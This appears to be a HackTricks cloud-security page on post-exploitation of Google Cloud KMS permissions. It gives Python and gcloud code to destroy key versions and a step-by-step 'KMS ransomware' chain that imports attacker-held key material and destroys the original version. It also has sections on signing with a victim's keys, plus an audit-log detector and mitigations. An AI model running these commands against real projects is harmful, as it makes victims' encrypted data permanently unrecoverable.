GCP - KMS Post Exploitation

Support HackTricks

KMS

Find basic information about KMS in:

GCP - KMS Enum

cloudkms.cryptoKeyVersions.destroy

An attacker with this permission can destroy a KMS key version. To do so, disable the version and then destroy it (the API also accepts a destroy on an ENABLED version, but disable-then-destroy is the usual sequence). Destruction is not immediate: the version moves to DESTROY_SCHEDULED and can still be restored (cloudkms.cryptoKeyVersions.restore) until the key's destroy-scheduled duration runs out (24 hours unless a different value was set when the key was created). After that the key material is gone and everything encrypted with that version is unrecoverable:

# pip install google-cloud-kms

from google.cloud import kms


def disable_key_version(project_id, location_id, key_ring_id, key_id, key_version):
    """
    Disables a key version in Cloud KMS (state DISABLED; reversible with enable).
    """
    # Create the client.
    client = kms.KeyManagementServiceClient()

    # Build the key version name.
    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)

    # Call the API to disable the key version. The update mask is required by the
    # API: without it the request is rejected.
    crypto_key_version = {'name': key_version_name, 'state': kms.CryptoKeyVersion.State.DISABLED}
    update_mask = {'paths': ['state']}
    return client.update_crypto_key_version(
        request={'crypto_key_version': crypto_key_version, 'update_mask': update_mask})


def destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version):
    """
    Schedules a key version for destruction in Cloud KMS. The version enters the
    DESTROY_SCHEDULED state and can be restored until the key's destroy-scheduled
    duration (24h by default) elapses; after that the material is gone for good.
    """
    # Create the client.
    client = kms.KeyManagementServiceClient()

    # Build the key version name.
    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)

    # Call the API to destroy the key version.
    return client.destroy_crypto_key_version(request={'name': key_version_name})


# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'  # Version number to disable and destroy

# Disable the key version
disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)

# Destroy the key version
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)

KMS Ransomware

In AWS it is possible to completely steal a KMS key by changing the key's resource policy so that only the attacker's account is allowed to use it. GCP has no equivalent resource policy: access to a key is governed by IAM bindings that a project or organization admin can always overwrite, so locking the owner out that way is not possible.

However, there is another way to carry out a global "KMS ransomware" against all the data protected by a key, which involves the following steps:

  • Create a new version of the key with key material imported by the attacker (who keeps a copy of it outside KMS). This first needs an import job on the key ring; its protection level must match the target key's:

gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL]
  • Make it the primary version (so any data encrypted from now on uses it)

  • Re-encrypt the data that was encrypted with the previous version(s) using the new one (this also needs decrypt permission on the key).

  • Disable and destroy the old key version(s)

  • Now only the attacker, who holds the original key material, can decrypt the data. Cloud KMS never exports key material, imported or not, so the victim cannot recover it from KMS once the old version is destroyed.

Here are the steps to import a new version and disable/destroy the old one:
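What the import step does on the wire, as an added example that is not code from this page or from gcloud: it reproduces the wrapping that `gcloud kms keys versions import --target-key-file` performs for the rsa-oaep-3072-sha1-aes-256 import method, using the `cryptography` package. The key material is wrapped with AES key wrap with padding (RFC 5649) under a random AES-256 key, that AES key is wrapped with RSA-OAEP (SHA-1, MGF1-SHA-1) under the import job's public key, and the two pieces are concatenated. The import job's RSA key pair is generated locally here as a stand-in so the example runs offline; that is an assumption of this example, since in reality the private half lives inside KMS and the public half is the `publicKey.pem` field of `gcloud kms import-jobs describe`.

```python
import os
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.keywrap import aes_key_wrap_with_padding, aes_key_unwrap_with_padding

# RSA-OAEP parameters of the RSA_OAEP_3072_SHA1_AES_256 import method:
# OAEP with SHA-1, MGF1 with SHA-1, no label.
OAEP_SHA1 = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA1()), algorithm=hashes.SHA1(), label=None)
RSA_3072_CIPHERTEXT_LEN = 384  # bytes; fixed by the modulus size


def wrap_for_import(import_job_public_key_pem, target_key_material):
    """
    Build the blob Cloud KMS expects for RSA_OAEP_3072_SHA1_AES_256:
        RSA-OAEP(import-job pubkey, ephemeral AES-256 key) || AES-KWP(ephemeral key, target material)
    For a symmetric key the target material is the raw 32-byte key (what
    `openssl rand -out my-key-material.bin 32` produces).
    """
    public_key = serialization.load_pem_public_key(import_job_public_key_pem)
    ephemeral_aes_key = os.urandom(32)
    wrapped_aes_key = public_key.encrypt(ephemeral_aes_key, OAEP_SHA1)             # 384 bytes
    wrapped_target = aes_key_wrap_with_padding(ephemeral_aes_key, target_key_material)  # RFC 5649
    return wrapped_aes_key + wrapped_target


def unwrap_import_blob(import_job_private_key, blob):
    """
    Inverse operation, which only the holder of the import job's private key
    (Cloud KMS, in reality) can perform. Used here to check the blob offline.
    """
    ephemeral_aes_key = import_job_private_key.decrypt(blob[:RSA_3072_CIPHERTEXT_LEN], OAEP_SHA1)
    return aes_key_unwrap_with_padding(ephemeral_aes_key, blob[RSA_3072_CIPHERTEXT_LEN:])


def demo_roundtrip():
    """
    Stand-in for the import job (assumption of this example): a locally generated
    3072-bit RSA pair. Returns the blob length and whether the material round-trips.
    """
    job_private_key = rsa.generate_private_key(public_exponent=65537, key_size=3072)
    job_public_pem = job_private_key.public_key().public_bytes(
        serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo)

    key_material = os.urandom(32)  # the attacker keeps this copy; KMS will never give it back
    blob = wrap_for_import(job_public_pem, key_material)
    recovered = unwrap_import_blob(job_private_key, blob)
    return len(blob), recovered == key_material


if __name__ == "__main__":
    print(demo_roundtrip())  # (424, True): 384 bytes of RSA-OAEP + 40 bytes of AES-KWP
```

If you wrap the material yourself instead of passing `--target-key-file`, the blob is what `gcloud kms keys versions import` takes through its wrapped-key-file flag (`--wrapped-key-file`). The point for the ransomware scenario is the line that draws `key_material`: the only copy outside KMS is the attacker's, which is exactly what makes the destroyed original unrecoverable for the victim.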

# Encrypt something with the original key (version 1 is primary at this point)
echo "This is a sample text to encrypt" > my-plaintext-file.txt
gcloud kms encrypt \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key \
    --plaintext-file my-plaintext-file.txt \
    --ciphertext-file my-encrypted-file.enc

# Decrypt it
gcloud kms decrypt \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key \
    --ciphertext-file my-encrypted-file.enc \
    --plaintext-file -


# Create an Import Job (its protection level must match the target key's).
# The job starts in PENDING_GENERATION; wait until `gcloud kms import-jobs describe` reports ACTIVE.
gcloud kms import-jobs create my-import-job \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --import-method "rsa-oaep-3072-sha1-aes-256" \
    --protection-level "software"

# Generate the attacker's key material (32 raw bytes for a symmetric key).
# Keep this file: KMS never exports key material, so it is the only copy outside KMS.
openssl rand -out my-key-material.bin 32

# Import the key material (gcloud wraps it locally with the import job's
# asymmetric public key before sending it)
gcloud kms keys versions import \
    --import-job my-import-job \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key \
    --algorithm "google-symmetric-encryption" \
    --target-key-file my-key-material.bin

# List the versions (the imported one should show up as version 2)
gcloud kms keys versions list \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key

# Make the new version primary (new encrypt calls now use it)
gcloud kms keys update \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key \
    --primary-version 2

# Decrypting still works at this point: the ciphertext embeds the version that
# produced it, so KMS keeps using version 1 regardless of which version is primary
gcloud kms decrypt \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key \
    --ciphertext-file my-encrypted-file.enc \
    --plaintext-file -

# Disable the initial version (from now on the decrypt above fails)
gcloud kms keys versions disable 1 \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key

# Schedule the old version for destruction (the version id is positional; there is
# no --version flag). During the destroy-scheduled period (24h by default)
# "gcloud kms keys versions restore 1 ..." undoes this; afterwards the material is gone.
gcloud kms keys versions destroy 1 \
    --location us-central1 \
    --keyring kms-lab-2-keyring \
    --key kms-lab-2-key
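The defender's view of the same sequence, as an added example that is not code from this page: a small detector over Cloud Audit Logs (Admin Activity) entries for cloudkms.googleapis.com, standard library only. It flags any import job creation, which is rare in most environments and worth an alert by itself, and any principal that imported a version, changed the primary version and scheduled a destroy on the same key within a time window. The log entries below are constructed to mirror the lab above and are not real logs; the project name and principal addresses are made up.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Admin Activity audit-log method names Cloud KMS emits for the steps of the
# import -> primary switch -> disable/destroy chain.
KMS_SERVICE = "cloudkms.googleapis.com"
METHOD_STEPS = {
    "google.cloud.kms.v1.KeyManagementService.CreateImportJob": "import_job",
    "google.cloud.kms.v1.KeyManagementService.ImportCryptoKeyVersion": "import",
    "google.cloud.kms.v1.KeyManagementService.UpdateCryptoKeyPrimaryVersion": "primary",
    "google.cloud.kms.v1.KeyManagementService.UpdateCryptoKeyVersion": "update",   # disable / enable
    "google.cloud.kms.v1.KeyManagementService.DestroyCryptoKeyVersion": "destroy",
}
CHAIN = {"import", "primary", "destroy"}  # the three steps that together mean "take-over"


def crypto_key_of(resource_name):
    """Reduce a cryptoKeyVersion resource name to its parent cryptoKey; other names pass through."""
    parts = resource_name.split("/")
    if "cryptoKeys" in parts:
        return "/".join(parts[: parts.index("cryptoKeys") + 2])
    return resource_name


def parse_ts(ts):
    """Audit-log timestamps are RFC 3339 with a trailing Z."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def find_kms_ransomware_indicators(log_lines, window=timedelta(hours=24)):
    """
    Scan JSON audit-log lines and return
      - every CreateImportJob (keyring-scoped, high signal on its own), and
      - every (principal, key) pair that imported a version, changed the primary and
        scheduled a destroy within `window`, with the ordered steps that were seen.
    """
    import_jobs = []
    per_key = defaultdict(list)
    for line in log_lines:
        entry = json.loads(line)
        payload = entry.get("protoPayload", {})
        if payload.get("serviceName") != KMS_SERVICE:
            continue
        step = METHOD_STEPS.get(payload.get("methodName"))
        if step is None:
            continue
        principal = payload.get("authenticationInfo", {}).get("principalEmail", "unknown")
        resource = payload.get("resourceName", "")
        when = parse_ts(entry["timestamp"])
        if step == "import_job":
            import_jobs.append({"principal": principal, "key_ring": resource, "time": when})
        else:
            per_key[(principal, crypto_key_of(resource))].append((when, step))

    chains = []
    for (principal, key), events in per_key.items():
        events.sort()
        if CHAIN <= {s for _, s in events} and events[-1][0] - events[0][0] <= window:
            chains.append({"principal": principal, "key": key, "steps": [s for _, s in events]})
    return {"import_jobs": import_jobs, "chains": chains}


def _entry(ts, method, resource, principal, service=KMS_SERVICE):
    """Build one constructed audit-log line with only the fields the detector reads."""
    return json.dumps({
        "timestamp": ts,
        "protoPayload": {
            "serviceName": service,
            "methodName": method,
            "resourceName": resource,
            "authenticationInfo": {"principalEmail": principal},
        },
    })


# Constructed sample (not real logs): the lab sequence from this page plus benign noise.
KR = "projects/victim-proj/locations/us-central1/keyRings/kms-lab-2-keyring"
KEY = KR + "/cryptoKeys/kms-lab-2-key"
SAMPLE_LOG_LINES = [
    _entry("2024-05-01T10:00:00Z", "google.cloud.kms.v1.KeyManagementService.CreateImportJob", KR, "attacker@example.com"),
    _entry("2024-05-01T10:05:00Z", "google.cloud.kms.v1.KeyManagementService.ImportCryptoKeyVersion", KEY, "attacker@example.com"),
    _entry("2024-05-01T10:10:00Z", "google.cloud.kms.v1.KeyManagementService.UpdateCryptoKeyPrimaryVersion", KEY, "attacker@example.com"),
    _entry("2024-05-01T10:15:00Z", "google.cloud.kms.v1.KeyManagementService.UpdateCryptoKeyVersion", KEY + "/cryptoKeyVersions/1", "attacker@example.com"),
    _entry("2024-05-01T10:20:00Z", "google.cloud.kms.v1.KeyManagementService.DestroyCryptoKeyVersion", KEY + "/cryptoKeyVersions/1", "attacker@example.com"),
    # Routine rotation clean-up by an admin: a destroy without import/primary steps is not a chain.
    _entry("2024-05-01T11:00:00Z", "google.cloud.kms.v1.KeyManagementService.DestroyCryptoKeyVersion", KR + "/cryptoKeys/other-key/cryptoKeyVersions/3", "admin@example.com"),
    # Non-KMS entry, ignored.
    _entry("2024-05-01T11:05:00Z", "storage.objects.get", "projects/_/buckets/b/objects/o", "app@example.com", service="storage.googleapis.com"),
]

if __name__ == "__main__":
    print(json.dumps(find_kms_ransomware_indicators(SAMPLE_LOG_LINES), indent=2, default=str))
```

Fed with a Cloud Logging export (one JSON entry per line), the same function works unchanged. The grouping key is (principal, cryptoKey) rather than the raw resource name because import and primary-switch events are logged against the key while disable and destroy are logged against the version.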

cloudkms.cryptoKeyVersions.useToEncrypt | cloudkms.cryptoKeyVersions.useToEncryptViaDelegation

Description

This permission allows using a KMS key version for encryption operations (Encrypt with a symmetric key). The ViaDelegation variant is the one used when another Google Cloud service performs the Encrypt on the caller's behalf (e.g. CMEK integrations) and is what roles/cloudkms.cryptoKeyEncrypterViaDelegation grants.

Impact

An attacker with this permission can encrypt data with the victim's KMS keys. Encrypting on its own reveals nothing, but it is a building block of the ransomware flow above: data re-encrypted under a key version the attacker controls becomes unreadable for everyone else once the original version is destroyed.

How it is obtained

Through IAM roles that include KMS permissions, e.g. roles/cloudkms.cryptoKeyEncrypter or roles/cloudkms.cryptoKeyEncrypterDecrypter, bound at project, key ring or key level.

Mitigations

  • Grant KMS permissions only to the principals that need them, preferably as key-level bindings rather than project-wide roles.

  • Use IAM policies (and IAM Conditions where possible) to control which principals can use each key.

Verification

  1. List the roles granted to the user at project level:

    gcloud projects get-iam-policy $PROJECT_ID --flatten="bindings[].members" --format='table(bindings.role)' --filter="bindings.members:$USER"
  2. Check the key-level policy too, since these permissions are often granted directly on the key and do not appear in the project policy:

    gcloud kms keys get-iam-policy $KEY --keyring $KEYRING --location $LOCATION
  3. Check whether any of those roles contain cloudkms.cryptoKeyVersions.useToEncrypt or cloudkms.cryptoKeyVersions.useToEncryptViaDelegation (gcloud iam roles describe ROLE lists the permissions of a role).

from google.cloud import kms
import base64


def encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext):
    """
    Encrypts data using a symmetric key from Cloud KMS.
    """
    # Create the client.
    client = kms.KeyManagementServiceClient()

    # Build the key name. Encrypt always uses the key's primary version;
    # the ciphertext embeds which version was used, so Decrypt finds it later.
    key_name = client.crypto_key_path(project_id, location_id, key_ring_id, key_id)

    # Convert the plaintext to bytes.
    plaintext_bytes = plaintext.encode('utf-8')

    # Call the API.
    encrypt_response = client.encrypt(request={'name': key_name, 'plaintext': plaintext_bytes})
    ciphertext = encrypt_response.ciphertext

    # Optional: Encode the ciphertext to base64 for easier handling.
    return base64.b64encode(ciphertext)


# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
plaintext = 'your-data-to-encrypt'

ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)
print('Ciphertext:', ciphertext)

cloudkms.cryptoKeyVersions.useToSign

Permission usage

The cloudkms.cryptoKeyVersions.useToSign permission allows a user to sign data with an asymmetric KMS key version (AsymmetricSign) or to compute a MAC with a MAC key (MacSign). Such keys are used for things like signing documents, artifacts or tokens, and for proving identity.

Post Exploitation

With this permission an attacker can produce signatures that anyone trusting the key's public key will accept, without ever seeing the private key (which never leaves KMS). What those signatures are worth depends on what the victim uses the key for.

gcloud commands

The signing subcommand is gcloud kms asymmetric-sign (there is no gcloud kms keys versions sign). It hashes the input file with the given digest algorithm and writes the raw signature to a file:

gcloud kms asymmetric-sign --version <VERSION> --key <KEY_NAME> --keyring <KEYRING_NAME> --location <LOCATION> --digest-algorithm <sha256|sha384|sha512> --input-file <FILE_TO_SIGN> --signature-file <OUTPUT_SIGNATURE_FILE>

Steps

  1. Find the key name (<KEY_NAME>), key ring (<KEYRING_NAME>), location (<LOCATION>) and the version to sign with (gcloud kms keys versions list).

  2. Pick the digest algorithm that matches the key's algorithm (e.g. sha256 for EC_SIGN_P256_SHA256 or RSA_SIGN_PKCS1_2048_SHA256).

  3. Run the command. The result can be checked with the public key (gcloud kms keys versions get-public-key) and openssl, since verification happens outside KMS.

import hashlib
from google.cloud import kms


def sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message):
    """
    Sign a message using an asymmetric key version from Cloud KMS.
    Only the digest is sent; the private key never leaves KMS.
    """
    # Create the client.
    client = kms.KeyManagementServiceClient()

    # Build the key version name (signing is a per-version operation).
    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)

    # Convert the message to bytes and calculate the digest. The digest field
    # (sha256 here) must match the key's algorithm.
    message_bytes = message.encode('utf-8')
    digest = {'sha256': hashlib.sha256(message_bytes).digest()}

    # Call the API to sign the digest. The signature is DER-encoded for EC keys
    # and raw PKCS#1 v1.5 / PSS bytes for RSA keys.
    sign_response = client.asymmetric_sign(request={'name': key_version_name, 'digest': digest})
    return sign_response.signature


# Example usage for signing
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'
message = 'your-message'

signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)
print('Signature:', signature)

cloudkms.cryptoKeyVersions.useToVerify

Description

This permission allows using a KMS key version to verify data; concretely it gates MacVerify on MAC (HMAC) keys. Cloud KMS has no AsymmetricVerify operation: signatures made with asymmetric keys are verified outside KMS with the public key, which requires cloudkms.cryptoKeyVersions.viewPublicKey rather than useToVerify.

Impact

Verification gives an attacker no secret and no ability to forge. For MAC keys it provides an oracle that tells valid tags from invalid ones, which can support other attacks that need to validate intercepted data, but on its own it is a low-impact permission.

Verification

Check that the principal has cloudkms.cryptoKeyVersions.useToVerify on the key. Listing the versions, as below, only needs cloudkms.cryptoKeyVersions.list, so it confirms the key exists but not that you can use it:

gcloud kms keys get-iam-policy <key> --keyring <keyring> --location <location>
gcloud kms keys versions list --location <location> --keyring <keyring> --key <key>

To verify a MAC from the CLI:

gcloud kms mac-verify --version <version> --key <key> --keyring <keyring> --location <location> --input-file <data-file> --signature-file <mac-file>

Mitigation

Do not grant cloudkms.cryptoKeyVersions.useToVerify to principals that do not need it, and be aware that roles/cloudkms.signerVerifier bundles it with useToSign, which is the dangerous half.

from google.cloud import kms
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec


def verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature):
    """
    Verify a signature produced by an asymmetric KMS key version.
    Cloud KMS has no AsymmetricVerify API, so the check is done locally with the
    version's public key (needs cloudkms.cryptoKeyVersions.viewPublicKey).
    Assumes an EC_SIGN_P256_SHA256 key; adapt the algorithm for RSA keys.
    """
    # Create the client.
    client = kms.KeyManagementServiceClient()

    # Build the key version name and fetch its PEM public key.
    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
    public_key_pem = client.get_public_key(request={'name': key_version_name}).pem
    public_key = serialization.load_pem_public_key(public_key_pem.encode('utf-8'))

    # Verify the DER-encoded ECDSA signature over the message.
    try:
        public_key.verify(signature, message.encode('utf-8'), ec.ECDSA(hashes.SHA256()))
        return True
    except InvalidSignature:
        return False


def verify_mac(project_id, location_id, key_ring_id, key_id, key_version, data, mac):
    """
    Verify an HMAC tag with a MAC key version. This is the operation that
    cloudkms.cryptoKeyVersions.useToVerify actually gates.
    """
    client = kms.KeyManagementServiceClient()
    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
    verify_response = client.mac_verify(request={'name': key_version_name, 'data': data, 'mac': mac})
    return verify_response.success


# Example usage for verification (signature from the signing example above)
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'
message = 'your-message'

verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature)
print('Verified:', verified)